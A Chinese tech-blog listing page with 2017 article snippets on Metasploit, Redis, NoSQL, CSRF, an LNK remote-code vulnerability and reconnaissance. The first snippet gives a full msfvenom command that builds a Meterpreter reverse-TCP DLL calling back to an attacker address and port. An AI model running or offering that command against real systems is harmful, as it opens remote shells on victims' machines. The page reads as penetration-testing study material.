一、环境搭建: 二、攻击流程: 攻击流程图解: 1.在kali linux中利用metasploit生成用于建立反向链接的dll文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.245 LPORT=4444 -f dll > ...
分类:
其他好文 时间:
2017-08-12 21:24:43
阅读次数:
177
1.关于关系型数据库和nosql数据库 关系型数据库是基于关系表的数据库,最终会将数据持久化到磁盘上,而nosql数据 库是基于特殊的结构,并将数据存储到内存的数据库。从性能上而言,nosql数据库 要优于关系型数据库,从安全性上而言关系型数据库要优于nosql数据库,所以在实际开发中一个项目中no ...
分类:
其他好文 时间:
2017-08-10 22:33:49
阅读次数:
221
Redis集群的相关概念 redis-cluster架构图 (1)所有的redis节点彼此互联(PING-PONG机制),内部使用二进制协议优化传输速度和带宽. (2)节点的fail是通过集群中超过半数的节点检测失效时才生效. (3)客户端与redis节点直连,不需要中间proxy层.客户端不需要连 ...
分类:
其他好文 时间:
2017-08-09 16:54:19
阅读次数:
238
0x01 Wmap简介 Wmap本身不是一个独立的漏洞扫描器,而是作为Metasploit的一个模块,结合Web漏洞和Web服务相关的模块协同工作,完成目标服务器的扫描任务,也就是说,如果我们想要使用Wmap模块就需要将它在Metasploit中载入才可以使用。 0x02 Metasploit数... ...
分类:
系统相关 时间:
2017-08-08 00:42:30
阅读次数:
1778
今天没上班,在小黑屋里看了一个一百多页的书《metasploit新手指南》,在此将笔记分享给大家。欢迎大家批评指正,共同学习进步。 metasploit新手指南 笔记 kali 0x01 metapoit基本文件结构如下: config metasploit的环境配置信息,数据库配置信息 data渗 ...
分类:
Web程序 时间:
2017-08-07 22:18:22
阅读次数:
361
昨天我们就下面的一些议题进行分享:(1)文本数据去重及排序分享人:simeon(2)信息收集子域名收集分享人:菲哥哥(3)对某目标站点的一次渗透分享人:simeon(4)使用MSF路由转发实现MSF框架的内网渗透分享人:myles007(5)CSRF攻击场景分析与重现学习分享人:myles007(6..
分类:
其他好文 时间:
2017-08-07 13:43:06
阅读次数:
102
今天是星期天,干点啥,反正一天没事,我也不想继续去搞 msf 的那些什么浏览器提权啊,PDF 提权啊,快捷方式提取啊,或者木马免杀什么的,毕竟现在我也不是为了去找工作而去学那些工具了,,, 说开这个靶场是前天,一个朋友在空间转发的,然后我就去看看吧。 然后,进去后,结果靶场就没搭建好,就玩不了,我就 ...
分类:
Web程序 时间:
2017-08-04 09:57:00
阅读次数:
221
错误信息: File 'xxx.jtl' does not contain the field names header, ensure the jmeter.save.saveservice.* properties are the same as when the CSV file was cr ...
分类:
其他好文 时间:
2017-07-28 13:26:32
阅读次数:
2099
0x01 前言 RCE漏洞存在于Windows处理LNK文件的环节。攻击者利用漏洞可以获得与本地用户相同的用户权限。被使用此漏洞攻击时,用户权限较少的账户相较管理员权限的用户受到的影响更小。 攻击者可以给受害者一个恶意的LNK 文件和关联的恶意二进制,文件可以存放在可移动磁盘或远程共享中。当用户用 ...
分类:
其他好文 时间:
2017-07-27 11:28:40
阅读次数:
200
情报搜集环境站渗透测试全过程的80%~90% 一、外围信息搜集(公开渠道信息搜集OSINT open source intelligence) 3.1.1信息收集-通过DNS和IP地址挖掘目标网络信息 1.whois域名注册信息查询 whois查询时去掉www、ftp等前缀 2.nslookup与d ...
分类:
其他好文 时间:
2017-07-26 13:36:04
阅读次数:
191